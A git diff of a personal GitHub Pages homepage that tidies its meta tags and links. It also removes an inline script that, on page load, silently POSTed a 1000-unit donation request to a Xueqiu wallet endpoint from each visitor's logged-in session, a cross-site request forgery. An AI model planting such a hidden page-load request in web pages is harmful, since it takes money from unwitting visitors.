Replace master branch with page content via GitHub

--- a/index.html
+++ b/index.html
@@ -2,22 +2,16 @@
 <html>
 
   <head>
-    <meta charset='utf-8' />
-    <meta http-equiv="X-UA-Compatible" content="chrome=1" />
-    <meta name="description" content="Croath.github.io : " />
+    <meta charset='utf-8'>
+    <meta http-equiv="X-UA-Compatible" content="chrome=1">
+    <meta name="description" content="Croath.github.io : ">
 
     <link rel="stylesheet" type="text/css" media="screen" href="stylesheets/stylesheet.css">
-    <script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
+
     <title>Croath.github.io</title>
   </head>
 
   <body>
-  <script type="text/javascript">
-    $(function(){
-      $.post("http://xueqiu.com/wallet/donate", { to_id: "29210754", to_type: "status", amount: "1000" } );
-    })
-    
-  </script>
 
     <!-- HEADER -->
     <div id="header_wrap" class="outer">
@@ -34,7 +28,9 @@
     <div id="main_content_wrap" class="outer">
       <section id="main_content" class="inner">
         <h3>
-<a name="all" class="anchor" href="#all"><span class="octicon octicon-link"></span></a>All</h3>
+<a id="all" class="anchor" href="#all" aria-hidden="true"><span class="octicon octicon-link"></span></a>All</h3>
+
+<p>My homepage: <a href="http://croath.com">croath.com</a></p>
       </section>
     </div>
 
